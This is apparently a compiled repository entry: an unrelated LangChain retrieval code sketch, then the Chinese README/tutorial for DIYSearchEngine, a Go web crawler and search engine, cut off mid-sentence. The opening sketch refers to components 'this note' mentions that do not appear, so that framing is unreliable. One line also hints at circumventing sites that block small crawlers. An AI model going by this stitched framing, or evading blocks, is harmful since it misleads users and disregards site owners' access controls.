> https://python.langchain.com.cn/docs/modules/agents/how_to/custom_llm_chat_agent
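For readers who want a concrete starting point for 方法三 (langchain + LLM + retrieval), here is a minimal sketch. It only recombines components this note already mentions (TextLoader, CharacterTextSplitter, HuggingFaceEmbeddings, ChatOpenAI) and assumes the langchain==0.0.225-era import paths, a local `knowledge.txt` file, and that `faiss-cpu` plus `sentence-transformers` are installed:

```python
from langchain.document_loaders import TextLoader
from langchain.text_splitter import CharacterTextSplitter
from langchain.embeddings import HuggingFaceEmbeddings
from langchain.vectorstores import FAISS
from langchain.chains import RetrievalQA
from langchain.chat_models import ChatOpenAI

# 1. Load and split the knowledge base into ~300-character chunks with overlap.
docs = TextLoader("knowledge.txt", encoding="utf-8").load()
chunks = CharacterTextSplitter(chunk_size=300, chunk_overlap=50).split_documents(docs)

# 2. Embed the chunks and build a vector index.
store = FAISS.from_documents(chunks, HuggingFaceEmbeddings())

# 3. Retrieve the top-k chunks for a query and let the LLM answer from them.
qa = RetrievalQA.from_chain_type(
    llm=ChatOpenAI(),
    retriever=store.as_retriever(search_kwargs={"k": 3}),
)
print(qa.run("怎么能够解决失眠?"))
```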
johnlui/DIYSearchEngine
https://github.com/johnlui/DIYSearchEngine
🔍 An open-source internet search engine written in Go, with the companion tutorial 《自己动手开发互联网搜索引擎》 (Build Your Own Internet Search Engine)
# Go 开发的开源互联网搜索引擎 DIYSearchEngine 是一个能够高速采集海量互联网数据的开源搜索引擎,采用 Go 语言开发。 > #### 想运行本项目请拉到项目底部,有[教程](#本项目运行方法)。 <br> <h2 align="center">《两万字教你自己动手开发互联网搜索引擎》</h2> ## 写在前面 本文是一篇教你做“合法搜索引擎”的文章,一切都符合《网络安全法》和 robots 业界规范的要求,如果你被公司要求爬一些上了反扒措施的网站,我个人建议你马上离职,我已经知道了好几起全公司数百人被一锅端的事件。 ## 《爬乙己》 搜索引擎圈的格局,是和别处不同的:只需稍作一番查考,便能获取一篇又一篇八股文,篇篇都是爬虫、索引、排序三板斧。可是这三板斧到底该怎么用代码写出来,却被作者们故意保持沉默,大抵可能确实是抄来的罢。 从我年方二十,便开始在新浪云计算店担任一名伙计,老板告诉我,我长相过于天真,无法应对那些难缠的云计算客户。这些客户时刻都要求我们的服务在线,每当出现故障,不到十秒钟电话就会纷至沓来,比我们的监控系统还要迅捷。所以过了几天,掌柜又说我干不了这事。幸亏云商店那边要人,无须辞退,便改为专管云商店运营的一种无聊职务了。 我从此便整天的坐在电话后面,专管我的职务。虽然只需要挨骂道歉,损失一些尊严,但总觉得有些无聊。掌柜是一副凶脸孔,主顾也没有好声气,教人活泼不得;只有在午饭后,众人一起散步时闲谈起搜索引擎,才能感受到几许欢笑,因此至今仍深刻铭记在心。 由于谷歌被戏称为“哥”,本镇居民就为当地的搜索引擎取了一个绰号,叫作度娘。 度娘一出现,所有人都笑了起来,有的叫到,“度娘,你昨天又加法律法规词了!”他不回答,对后台说,“温两个热搜,要一碟文库豆”,说着便排出九枚广告。我们又故意的高声嚷道,“你一定又骗了人家的钱了!”度娘睁大眼睛说,“你怎么这样凭空污人清白……”“什么清白?我前天亲眼见你卖了莆田系广告,第一屏全是。”度娘便涨红了脸,额上的青筋条条绽出,争辩道,“广告不能算偷……流量!……互联网广告的事,能算偷么?”接连便是难懂的话,什么“免费使用”,什么“CPM”之类,引得众人都哄笑起来:店内外充满了快活的空气。 ## 本文目标 三板斧文章遍地都是,但是真的自己开发出来搜索引擎的人却少之又少,其实,开发一个搜索引擎没那么难,数据量也没有你想象的那么大,倒排索引也没有字面上看着那么炫酷,BM25 算法也没有它的表达式看起来那么夸张,只给几个人用的话也没多少计算压力。 突破自己心灵的枷锁,只靠自己就可以开发一个私有的互联网搜索引擎! 本文是一篇“跟我做”文章,只要你一步一步跟着我做,最后就可以得到一个可以运行的互联网搜索引擎。本文的后端语言采用 Golang,内存数据库采用 Redis,字典存储采用 MySQL,不用费尽心思地研究进程间通信,也不用绞尽脑汁地解决多线程和线程安全问题,也不用自己在磁盘上手搓 B+ 树致密排列,站着就把钱挣了。 ## 目录 把大象装进冰箱,只需要三步: 1. 编写高性能爬虫,从互联网上爬取网页 2. 使用倒排索引技术,将网页拆分成字典 3. 使用 BM25 算法,返回搜索结果 ## 第一步,编写高性能爬虫,从互联网上爬取网页 Golang 的协程使得它特别适合拿来开发高性能爬虫,只要利用外部 Redis 做好“协程间通信”,你有多少 CPU 核心 go 都可以吃完,而且代码写起来还特别简单,进程和线程都不需要自己管理。当然,协程功能强大,代码简略,这就导致它的 debug 成本很高:我在写协程代码的时候感觉自己像在炼丹,修改一个字符就可以让程序从龟速提升到十万倍,简直比操控 ChatGPT 还神奇。 在编写爬虫之前,我们需要知道从互联网上爬取内容需要遵纪守法,并遵守`robots.txt`,否则,可能就要进去和前辈们切磋爬虫技术了。robots.txt 的具体规范大家可以自行搜索,下面跟着我开搞。 新建 go 项目我就不演示了,不会的可以问一下 ChatGPT~ ### 爬虫工作流程 我们先设计一个可以落地的爬虫工作流程。 #### 1. 设计一个 UA 首先我们要给自己的爬虫设定一个 UA,尽量采用较新的 PC 浏览器的 UA 加以改造,加入我们自己的 spider 名称,我的项目叫“Enterprise Search Engine” 简称 ESE,所以我设定的 UA 是 `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4280.67 Safari/537.36 ESESpider/1.0`,你们可以自己设定。 需要注意的是,部分网站会屏蔽非头部搜索引擎的爬虫,这个需要你们转动聪明的小脑袋瓜自己解决哦。 #### 2. 选择一个爬虫工具库 我选择的是 [PuerkitoBio/goquery](https://github.com/PuerkitoBio/goquery),它支持自定义 UA 爬取,并可以对爬到的 HTML 页面进行解析,进而得到对我们的搜索引擎十分重要的页面标题、超链接等。 #### 3. 
设计数据库 爬虫的数据库倒是特别简单,一个表即可。这个表里面存着页面的 URL 和爬来的标题以及网页文字内容。 ```sql CREATE TABLE `pages` ( `id` int unsigned NOT NULL AUTO_INCREMENT, `url` varchar(768) CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci DEFAULT NULL COMMENT '网页链接', `host` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci DEFAULT NULL COMMENT '域名', `dic_done` tinyint DEFAULT '0' COMMENT '已拆分进词典', `craw_done` tinyint NOT NULL DEFAULT '0' COMMENT '已爬', `craw_time` timestamp NOT NULL DEFAULT '2001-01-01 00:00:00' COMMENT '爬取时刻', `origin_title` varchar(2000) CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci DEFAULT NULL COMMENT '上级页面超链接文字', `referrer_id` int NOT NULL DEFAULT '0' COMMENT '上级页面ID', `scheme` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci DEFAULT NULL COMMENT 'http/https', `domain1` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci DEFAULT NULL COMMENT '一级域名后缀', `domain2` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci DEFAULT NULL COMMENT '二级域名后缀', `path` varchar(2000) CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci DEFAULT NULL COMMENT 'URL 路径', `query` varchar(2000) CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci DEFAULT NULL COMMENT 'URL 查询参数', `title` varchar(1000) CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci DEFAULT NULL COMMENT '页面标题', `text` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci COMMENT '页面文字', `created_at` timestamp NOT NULL DEFAULT '2001-01-01 08:00:00' COMMENT '插入时间', PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci; ``` #### 4. 给爷爬! 爬虫有一个极好的特性:自我增殖。每一个网页里,基本都带有其他网页的链接,这样我们就可以道生一,一生二,二生三,三生万物了。 此时,我们只需要找一个导航网站,手动把该网站的链接插入到数据库里,爬虫就可以开始运作了。各位可以自行挑选可口的页面链接服用。 我们正式进入实操阶段,以下都是可以运行的代码片段,代码逻辑在注释里面讲解。 我采用`joho/godotenv`来提供`.env`配置文件读取的能力,你需要提前准备好一个`.env`文件,并在里面填写好可以使用的 MySQL 数据库信息,具体可以参考项目中的`.env.example`文件。 ```go func main() { fmt.Println("My name id enterprise-search-engine!") // 加载 .env initENV() // 该函数的具体实现可以参考项目代码 // 开始爬 nextStep(time.Now()) // 阻塞,不跑爬虫时用于阻塞主线程 select {} } // 循环爬 func nextStep(startTime time.Time) { // 初始化 gorm 数据库 dsn0 := os.Getenv("DB_USERNAME0") + ":" + os.Getenv("DB_PASSWORD0") + "@(" + os.Getenv("DB_HOST0") + ":" + os.Getenv("DB_PORT0") + ")/" + os.Getenv("DB_DATABASE0") + "?charset=utf8mb4&parseTime=True&loc=Local" gormConfig := gorm.Config{} db0, _ := gorm.Open(mysql.Open(dsn0), &gormConfig) // 从数据库里取出本轮需要爬的 100 条 URL var pagesArray []models.Page db0.Table("pages"). Where("craw_done", 0). Order("id").Limit(100).Find(&pagesArray) tools.DD(pagesArray) // 打印结果 // 限于篇幅,下面用文字描述 1. 循环展开 pagesArray 2. 针对每一个 page,使用 curl 工具类获取网页文本 3. 解析网页文本,提取出标题和页面中含有的超链接 4. 将标题、一级域名后缀、URL 路径、插入时间等信息补充完全,更新到这一行数据上 5. 将页面上的超链接插入 pages 表,我们的网页库第一次扩充了! fmt.Println("跑完一轮", time.Now().Unix()-startTime.Unix(), "秒") nextStep(time.Now()) // 紧接着跑下一条 } ``` ![](https://qn.lvwenhan.com/2023-06-28-16878837968415.jpg) 我已经事先将 hao123 的链接插入了 pages 表,所以我运行`go build -o ese *.go && ./ese`命令之后,得到了如下信息: ```ruby My name id enterprise-search-engine! 加载.env : /root/enterprise-search-engine/.env APP_ENV: local [[{1 0 https://www.hao123.com 0 0 2001-01-01 00:00:00 +0800 CST 2001-01-01 08:00:00 +0800 CST 0001-01-01 00:00:00 +0000 UTC}]] ``` ![](https://qn.lvwenhan.com/2023-06-27-16877958190576.jpg) <center>《递龟》</center> 上面的代码中,我们第一次用到了~~递龟~~递归:自己调用自己。 #### 5. 
合法合规:遵守 robots.txt 规范 我选择用`temoto/robotstxt`这个库来探查我们的爬虫是否被允许爬取某个 URL,使用一张单独的表来存储每个域名的 robots 规则,并在 Redis 中建立缓存,每次爬取 URL 之前,先进行一次匹配,匹配成功后再爬,保证合法合规。 ### 制造真正的生产级爬虫 ![怎样画马](https://qn.lvwenhan.com/2023-06-27-怎样画马.jpg) <center>《怎样画马》</center> 有了前面这个理论上可以运行的简单爬虫,下面我们就要给这匹马补充亿点细节了:生产环境中,爬虫性能优化是最重要的工作。 从某种程度上来说,搜索引擎的优劣并不取决于搜索算法的优劣,因为算法作为一种“特定问题的简便算法”,一家商业公司比别家强的程度很有限,搜索引擎的真正优劣在于哪家能够以最快的速度索引到互联网上层出不穷的新页面和已经更新过内容的旧页面,在于哪家能够识别哪个网页是价值最高的网页。 识别网页价值方面,李彦宏起家的搜索专利,以及谷歌大名鼎鼎的 PageRank 都拥有异曲同工之妙。但本文的重点不在这个领域,而在于技术实现。让我们回到爬虫性能优化,为什么性能优化如此重要呢?我们构建的是互联网搜索引擎,需要爬海量的数据,因此我们的爬虫需要足够高效:中文互联网有 400 万个网站,3500 亿个网页,哪怕只爬千分之一,3.5 亿个网页也不是开玩笑的,如果只是单线程阻塞地爬,消耗的时间恐怕要以年为单位了。 爬虫性能优化,我们首先需要规划一下硬件。 #### 硬件要求 首先计算磁盘空间,假设一个页面 20KB,在不进行压缩的情况下,一亿个页面就需要 `20 * 100000000 / 1024 / 1024 / 1024 = 1.86TB` 的磁盘空间,而我们打算使用 MySQL 来存储页面文本,需要的空间会更大一点。 我的爬虫花费了 2 个月的时间,爬到了大约 1 亿个 URL,其中 3600 万个爬到了页面的 HTML 文本存在了数据库里,共消耗了超过 600GB 的磁盘空间。 除了硬性的磁盘空间,剩下的就是尽量多的 CPU 核心数和内存了:CPU 拿来并发爬网页,内存拿来支撑海量协程的消耗,外加用 Redis 为爬虫提速。爬虫阶段对内存的要求还不大,但在后面第二步拆分字典的时候,大内存容量的 Redis 将成为提速利器。 所以,我们对硬件的需求是这样的:一台核心数尽量多的物理机拿来跑我们的 ese 二进制程序,外加高性能数据库(例如16核64GB内存,NVME磁盘),你能搞到多少台数据库就准备多少台,就算你搞到了 65536 台数据库,也能跑满,理论上我们可以无限分库分表。能这么搞是因为网页数据具有离散性,相互之间的关系在爬虫和字典阶段还不存在,在查询阶段才比较重要。 顺着这个思路,有人可能就会想,我用 KV 数据库例如 MongoDB 来存怎么样呢?当然是很好的,但是MongoDB 不适合干的事情实在是太多啦,所以你依然需要 Redis 和 MySQL 的支持,如果你需要爬取更大规模的网页,可以把 MongoDB 用起来,利用进一步推高系统复杂度的方式获得一个显著的性能提升。 下面我们开始进行软件优化,我只讲述关键步骤,各位有什么不明白的地方可以参考项目代码。 #### 重用 HTTP 客户端以防止内存泄露 这个点看起来很小,但当你瞬间并发数十万协程的时候,每个协程 1MB 的内存浪费累积起来都是巨大的,很容易造成 OOM。 我们在 tools 文件夹下创建`curl.go`工具类,专门用来存放[全局 client](https://req.cool/zh/docs/tutorial/best-practices/#%e9%87%8d%e7%94%a8-client) 和 curl 工具函数: ```go package tools import ... //省略,具体可以参考项目代码 // 全局重用 client 对象,4 秒超时,不跟随 301 302 跳转 var client = req.C().SetTimeout(time.Second * 4).SetRedirectPolicy(req.NoRedirectPolicy()) // 返回 document 对象和状态码 func Curl(page models.Page, ch chan int) (*goquery.Document, int) { ... //省略,具体可以参考项目代码 } ``` #### 基础知识储备:goroutine 协程 我默认你已经了解 go 协程是什么了,它就是一个看起来像魔法的东西。在这里我提供一个理解协程的小诀窍:每个协程在进入磁盘、网络等“只需要后台等待”的任务之后,会把当前 CPU 核心(可以理解成一个图灵机)的指令指针 goto 到下一个协程的起始。 需要注意的是,协程是一种特殊的并发形式,你在并发函数内调用的函数必须都支持并发调用,类似于传统的“线程安全”,如果你一不小心写了不安全的代码,轻则卡顿,重则 crash。 #### 一次取出一批需要爬的 URL,使用协程并发爬 协程代码实操来啦! ```go // tools.DD(pagesArray) // 打印结果 // 创建 channel 数组 chs := make([]chan int, len(pagesArray)) // 展开 pagesArray 数组 for k, v := range pagesArray { // 存储 channel 指针 chs[k] = make(chan int) // 阿瓦达啃大瓜!! go craw(v, chs[k], k) } // 注意,下面的代码不可省略,否则你上面 go 出来的那些协程会瞬间退出 var results = make(map[int]int) for _, ch := range chs { // 神之一手,收集来自协程的返回数据,并 hold 主线程不瞬间退出 r := <-ch _, prs := results[r] if prs { results[r] += 1 } else { results[r] = 1 } } // 当代码执行到这里的时候,说明所有的协程都已经返回数据了 fmt.Println("跑完一轮", time.Now().Unix()-startTime.Unix(), "秒") ``` `craw`函数协程化: ```go // 真的爬,存储标题,内容,以及子链接 func craw(status models.Page, ch chan int, index int) { // 调用 CURL 工具类爬到网页 doc, chVal := tools.Curl(status, ch) // 对 doc 的处理在这里省略 // 最重要的一步,向 chennel 发送 int 值,该动作是协程结束的标志 ch <- chVal return } ``` 协程优化做完了,CPU 被吃满了,接下来数据库要成为瓶颈了。 ### MySQL 性能优化 做到这里,在做普通业务逻辑的时候非常快的 MySQL 已经是整个系统中最慢的一环了:pages 表一天就要增加几百万行,MySQL 会以肉眼可见的速度慢下来。我们要对 MySQL 做性能优化。 #### 何以解忧,唯有索引 首先,收益最大的肯定是加索引,这句话适用于 99% 的场景。 在你磁盘容量够用的情况下,加索引通常可以获得数百倍到数万倍的性能提升。我们先给 url 加个索引,因为我们每爬到一个 URL 都要查一下它是否已经在表里面存在了,这个动作的频率是非常高的,如果我们最终爬到了一亿个页面,那这个对比动作至少会做百亿次。 #### 部分场景下很好用的分库分表 非常幸运,爬虫场景和分库分表非常契合:只要我们能根据 URL 将数据均匀地分散开,不同的 URL 之间是没有多少关系的。那我们该怎么将数据分散开呢?使用散列值! 每一个 URL 在 MD5 之后,都会得到一个形如`698d51a19d8a121ce581499d7b701668`的 32 位长度的 16 进制数。而这些数字在概率上是均等的,所以理论上我们可以将数亿个 URL 均匀分布在多个库的多个表里。下面问题来了,该怎么分呢? #### 只有一台数据库,应该分表吗? 
如果你看过我的[《高并发的哲学原理(八)-- 将 InnoDB 剥的一丝不挂:B+ 树与 Buffer Pool 》](https://lvwenhan.com/tech-epic/506.html)的话,就会明白,只要你能接受分表的逻辑代价,那在任何大数据量场景下分表都是有明显收益的,因为随着表容量的增加,那棵 16KB 页块组成的 B+ 树的复杂度增加是超线性的,用牛逼的话说就是:二阶导数持续大于 0。此外,缓存也会失效,你的 MySQL 运行速度会降低到一个令人发指的水平。 所以,即便你只有一台数据库,那也应该分表。如果你的磁盘是 NVME,我觉得单机拿出 MD5 的前两位数字,分出来 16 x 16 = 256 个表是比较不错的。 当然,如果你能搞到 16 台数据库服务器,那拿出第一位 16 进制数字选定物理服务器,再用二三位数字给每台机器分 256 个表也是极好的。 #### 我的真实硬件和分表逻辑 由于我司比较节俭~~贫穷~~,机房的服务器都是二手的,实在是拿不出高性能的 NVME 服务器,于是我找 IT 借了两台 ThinkBook 14 寸笔记本装上了 CentOS Stream 9: 1. 把内存扩充到最大,形成了 8GB 板载 + 32GB 内存条一共 40GB 的奇葩配置 2. CPU 是 AMD Ryzen 5 5600U,虽然是低压版的 CPU,只有六核十二线程,但是也比 Intel 的渣渣 CPU 快多了(Intel:牙膏真的挤完了,一滴都没有了) 3. 磁盘就用自带的 500GB NVME,实测读写速度能跑到 3GB/2GB,十分够用 由于单台机器只有 6 核,我就各给他们分了 128 个表,在每次要执行 SQL 之前,我会先用 URL 作为参数获取一下它对应的数据库服务器和表名。表名获取逻辑如下: 1. 计算此 URL 的 MD5 散列值 2. 取前两位十六进制数字 3. 拼接成类似`pages_0f`样子的表名 ```go tableName := table + "_" + tools.GetMD5Hash(url)[0:2] ``` ### 爬虫数据流和架构优化 上面我们已经使用协程把 CPU 全部利用起来了,又使用分库分表技术把数据库硬件全部利用起来了,但是如果你这个时候直接用上面的代码开始跑,会发现速度还是不够快:因为某些工作 MySQL 还是不擅长做。 此时,我们就需要对数据流和架构做出优化了。 #### 拆分仓库表和状态表 原始的 pages 表有 16 个字段,在我们爬的过程中,只用得到五个:`id` `url` `host` `craw_done` `craw_time`。而看过我上面的 InnoDB 文章的小伙伴还知道,在页面 HTML 被填充进`text`字段之后,pages 表的 16KB 页块会出现频繁的调整和指针的乱飞,对 InnoDB 的“局部性”性能涡轮的施展非常不利,会造成 buffer pool 的频繁失效。 所以,为了爬的更快,为 pages 表打造一个性能更强的“影子”就十分重要。于是,我为`pages_0f`表打造了只包含上面五个字段的`status_0f`兄弟表,数据从 pages 表里面复制而来,承担一些频繁读写任务: 1. 检查 URL 是否已经在库,即如果以前别的页面上已经出现了这个 URL 了,本次就不需要再入库了 2. 找出下一批需要爬的页面,即`craw_done=0`的 URL 3. craw_time 承担日志的作用,用于统计过去一段时间的爬虫效率 除了这些高频操作,存储页面 HTML 和标题等信息的低频操作是可以直接入`paqes_0f`仓库表的。 #### 实时读取 URL 改为后台定时读取 随着单表数据量的逐渐提升,每一轮开始时从数据库里面批量读出需要爬的 URL 成了一个相对耗时的操作,即便每张表只需要 500ms,那轮询 256 张表总耗时也达到了 128 秒之多,这是无法接受的,所以这个流程也需要异步化。你问为什么不异步同时读取 256 张表?因为 MySQL 最宝贵的就是连接数,这样会让连接数直接爆掉,大家都别玩了,关于连接数我们下面还会有提及。 我们把流程调整一下:每 20 秒从 status 表中搜罗一批需要爬的 URL 放进 Redis 中积累起来,爬的时候直接从 Redis 中读一批。这么做是为了把每一秒的时间都利用起来,尽力填满协程爬虫的胃口。 ```go // 在 main() 中注册定时任务 c := cron.New(cron.WithSeconds()) // 每 20 秒执行一次 prepareStatusesBackground 函数 c.AddFunc("*/20 * * * * *", prepareStatusesBackground) go c.Start() // prepareStatusesBackground 函数中,使用 LPush 向有序列表的头部插入 URL for _, v := range _statusArray { taskBytes, _ := json.Marshal(v) db.Rdb.LPush(db.Ctx, "need_craw_list", taskBytes) } // 每一轮都使用 RPop 从有序列表的尾部读取需要爬的 URL var statusArr []models.Status maxNumber := 1 // 放大倍数,控制每一批的 URL 数量 for i := 0; i < 256*maxNumber; i++ { jsonString := db.Rdb.RPop(db.Ctx, "need_craw_list").Val() var _status models.Status err := json.Unmarshal([]byte(jsonString), &_status) if err != nil { continue } statusArr = append(statusArr, _status) } ``` #### 十分重要的爬虫压力管控 过去十年,中国互联网每次有搜索引擎新秀崛起,我都要被新爬虫 DDOS 一遍,想想就气。这帮大厂的菜鸟程序员,以为随便一个网站都能承受住 2000 QPS,实际上互联网上 99.9% 网站的极限 QPS 到不了 100,超过 10 都够呛。对了,如果有 YisouSpider 的人看到本文,请回去推动一下你们的爬虫优化,虽然你们的爬虫不会持续高速爬取,但是你们在每分钟的第一秒并发 10 个请求的方法更像是 DDOS,对系统的危害更大... 
我们要像谷歌那样,做一个压力均匀的文明爬虫,这就需要我们把每一个域名的爬虫频率都记录下来,并实时进行调整。我基于 Redis 和每个 URL 的 host 做了一个计数器,在每次真的要爬某个 URL 之前,调用一次检测函数,看是否对单个域名的爬虫压力过大。 此外,由于我们的 craw 函数是协程调用的,此时 Redis 就显得更为重要了:它能提供宝贵的“线程安全数据读写”功能,如果你也是`sync.Map`的受害者,我相信你一定懂我😭 > #### 我认为,单线程的 Redis 是 go 协程最佳的伙伴,就像 PHP 和 MySQL 那样。 具体代码我就不放了,有需要的同学可以自己去看项目代码哦。 #### 疯狂使用 Redis 加速频繁重复的数据库调用 我们使用协程高速爬到数据了,下一步就是存储这些数据。这个操作看起来很简单,更新一下原来那一行,再插入 N 行新数据不就行了吗,其实不行,还有一个关键步骤需要使用 Redis 来加速:新爬到的 URL 是否已经在数据库里存在了。这个操作看起来简单,但在我们解决了上面这些性能问题以后,庞大的数量就成了这一步最大的问题,每一次查询会越来越慢,查询字数还特别多,这谁顶得住。 如果我们拿 Redis 来存 URL,岂不是需要把所有 URL 都存入 Redis 吗,这内存需求也太大了。这个时候,我们的老朋友,`局部性`又出现了:由于我们的爬虫是按照顺序爬的,那“朋友的朋友也是朋友”的概率是很大的,所以我们只要在 Redis 里记录一下某条 URL 是否存在,那之后一段时间,这个信息被查到的概率也很大: ```go // 我们使用一个 Hash 来存储 URL 是否存在的状态 statusHashMapKey := "ese_spider_status_exist" statusExist := db.Rdb.HExists(db.Ctx, statusHashMapKey, _url).Val() // 若 HashMap 中不存在,则查询或插入数据库 if !statusExist { ··· 代码省略,不存在则创建这行 page,存在则更新信息 ··· // 无论是否新插入了数据,都将 _url 入 HashMap db.Rdb.HSet(db.Ctx, statusHashMapKey, _url, 1).Err() } ``` 这段代码看似简单,实测非常好用,唯一的问题就是不能运行太长时间,隔一段时间得清空一次,因为随着时间的流逝,局部性会越来越差。 细心的小伙伴可能已经发现了,既然爬取状态已经用 Redis 来承载了,那还需要区分 pages 和 status 表吗?需要,因为 Redis 也不是全能的,它的基础数据依然是来自 MySQL 的。目前这个架构类似于复杂的三级火箭,看起来提升没那么大,但这小小的提速可能就能让你爬三亿个网页的时间从 3 个月缩减到 1 个月,是非常值的。 另外,如果通过扫描 256 张表中 craw_time 字段的方式来统计“过去 N 分钟爬了多少个 URL、有效页面多少个、因为爬虫压力而略过的页面多少个、网络错误的多少个、多次网络错误后不再重复爬取的多少个”的数据,还是太慢了,也太消耗资源了,这些统计信息也需要使用 Redis 来记录: ```go // 过去一分钟爬到了多少个页面的 HTML allStatusKey := "ese_spider_all_status_in_minute_" + strconv.Itoa(int(time.Now().Unix())/60) // 计数器加 1 db.Rdb.IncrBy(db.Ctx, allStatusKey, 1).Err() // 续命 1 小时 db.Rdb.Expire(db.Ctx, allStatusKey, time.Hour).Err() // 过去一分钟从新爬到的 HTML 里面提取出了多少个新的待爬 URL newStatusKey := "ese_spider_new_status_in_minute_" + strconv.Itoa(int(time.Now().Unix())/60) // 计数器加 1 db.Rdb.IncrBy(db.Ctx, newStatusKey, 1).Err() // 续命 1 小时 db.Rdb.Expire(db.Ctx, newStatusKey, time.Hour).Err() ``` ### 生产爬虫遇到的其他问题 在我们不断提高爬虫速度的过程中,爬虫的复杂度也在持续上升,我们会遇到玩具爬虫遇不到的很多问题,接下来我分享一下我的处理经验。 #### 抑制暴增的数据库连接数 在协程这个大杀器的协助之下,我们可以轻易写出超高并行的代码,把 CPU 全部吃完,但是,并行的协程多了以后,数据库的连接数压力也开始暴增。MySQL 默认的最大连接数只有 151,根据我的实际体验,哪怕是一个协程一个连接,我们这个爬虫也可以轻易把连接数干到数万,这个数字太大了,即便是最新的 CPU 加上 DDR5 内存,受制于 MySQL 算法的限制,在连接数达到这个级别以后,处理海量连接数所需要的时间也越来越多。这个情况和[《高并发的哲学原理(二)-- Apache 的性能瓶颈与 Nginx 的性能优势》](https://lvwenhan.com/tech-epic/500.html)一文中描述的 Apache 的 prefork 模式比较像。好消息是,最近版本的 MySQL 8 针对连接数匹配算法做了优化,大幅提升了大量连接数下的性能。 除了协程之外,分库分表对连接数的的暴增也负有不可推卸的责任。为了提升单条 SQL 的性能,我们给单台数据库服务器分了 256 张表,这种情况下,以前的一个连接+一条 SQL 的状态会突然增加到 256 个连接和 256 条 SQL,如果我们不加以限制的话,可以说协程+分表一启动,你就一定会收到海量的`Too many connections`报错。我的解决方法是,在 gorm 初始化的时候,给他设定一个“单线程最大连接数”: ```go dbdb0, _ := _db0.DB() dbdb0.SetMaxIdleConns(1) dbdb0.SetMaxOpenConns(100) dbdb0.SetConnMaxLifetime(time.Hour) ``` 根据我的经验,100 个够用了,再大的话,你的 TCP 端口就要不够用了。 #### 域名黑名单 我们都知道,内容农场是一种专门钻搜索引擎空子的垃圾内容生产者,爬虫很难判断哪些网站是内容农场,但是人一点进去就能判断出来。而这些域名的内部链接做的又特别好,这就导致我们需要手动给一些恶心的内容农场域名加黑名单。我们把爬到的每个域名下的 URL 数量统计一下,搞一个动态的排名,就能很容易发现头部的内容农场域名了。 #### 复杂的失败处理策略 > 生产代码和教学代码最大的区别就是成吨的错误处理!—— John·Lui(作者自己) 如果你真的要搞一个涵盖数亿页面的可以用的搜索引擎,你会碰到各种各样的奇葩失败,这些失败都需要拿出特别的处理策略,下面我分享一下我遇到过的问题和我的处理策略。 1. 单页面超时非常重要:如果你想尽可能地在一段时间内爬到尽量多的页面的话,缩短你 curl 的超时时间非常重要,经过摸索,我把这个时间设定到了 4 秒,既能爬到绝大多数网页,也不会浪费时间在一些根本就无法响应的 URL 上。 2. 单个 URL 错误达到一定数量以后,需要直接拉黑,不然一段时间后,你的爬虫整天就只爬那些被无数次爬取失败的 URL 上啦,一个新页面也爬不到。这个次数我设定的是 3 次。 3. 如果某个 URL 返回的 HTML 无法被解析,果断放弃,没必要花费额外资源重新爬。 4. 由于我们的数据流已经是三级火箭形态,所以在各种地方加上“动态锁”就很必要,因为很多时候我们需要手动让其他级火箭发动机暂停运行,手动检修某一级发动机。我一般拿 MySQL 来做这件事,创建一个名为`kvstores`的表,只有 key value 两个字段,需要的时候我会手动修改特定 key 对应的 value 值,让某一级发动机暂停一下。 5. 由于 curl 的结果具有不确定性,务必需要保证任何情况下,都要给 channel 返回信号量,不然你的整个应用会直接卡死。 6. 
一个页面内经常会有同一个超链接重复出现,在内存里保存已经见过的 URL 并跳过重复值可以显著节约时间。 7. 我建了一个 MySQL 表来存储我手动插入的黑名单域名,这个非常好用,可以在爬虫持续运行的时候随时“止损”,停止对黑名单域名的新增爬取。 至此,我们的爬虫终于构建完成了。 ### 爬虫运行架构图 现在我们的爬虫运行架构图应该是下面这样的: ![whiteboard_exported_image](https://qn.lvwenhan.com/2023-07-06-whiteboard_exported_image.png) 爬虫搞完了,让我们进入第二大部分。 ## 第二步,使用倒排索引生成字典 那个~~男人~~一听就很牛逼的词出现了:倒排索引。 对于没搞过倒排索引的人来说,这个词听起来和“生态化反”一样牛逼,其实它非常简单,简单程度堪比 HTTP 协议。 ### 倒排索引到底是什么 下面这个例子可以解释倒排索引是个什么东西: 1. 我们有一个表 titles,含有两个字段,ID 和 text,假设这个表有 100 行数据,其中第一行 text 为“爬虫工作流程”,第二行为“制造真正的生产级爬虫” 2. 我们对这两行文本进行分词,第一行可以得到“爬虫”、“工作”、“流程”三个词,第二行可以得到“制造”、“真正的”、“生产级”、“爬虫”四个词 3. 我们把顺序颠倒过来,以词为 key,以①`titles.id` ②`,` ③`这个词在 text 中的位置` 这三个元素拼接在一起为一个`值`,不同 text 生成的`值`之间以 - 作为间隔,对数据进行“反向索引”,可以得到: 1. 爬虫: 1,0-2,8 2. 工作:1,2 3. 流程:1,4 4. 制造:2,0 5. 真正的:2,2 6. 生产级:2,5 倒排索引完成了!就是这么简单。说白了,就是把所有内容都分词出来,再反向给每个词标记出“他出现在哪个文本的哪个位置”,没了,就是这么简单。下面是我生成的字典中,“辰玺”这个词的字典值: ```text 110,85,1,195653,7101-66,111,1,195653,7101- ``` 你问为什么我不找个常见的词?因为随便一个常见的词,它的字典长度都是以 MB 为单位的,根本没法放出来... #### 还有一个牛逼的词,最小完美哈希,可以用来排布字典数据,加快搜索速度,感兴趣的同学可以自行学习 ### 生成倒排索引数据 理解了倒排索引是什么以后,我们就可以着手把我们爬到的 HTML 处理成倒排索引了。 我使用`yanyiwu/gojieba`这个库来调用结巴分词,按照以下步骤对我爬到的每一个 HTML 文本进行分词并归类: 1. 分词,然后循环处理这些词: 2. 统计词频:这个词在该 HTML 中出现的次数 3. 记录下这个词在该 HTML 中每一次出现的位置,从 0 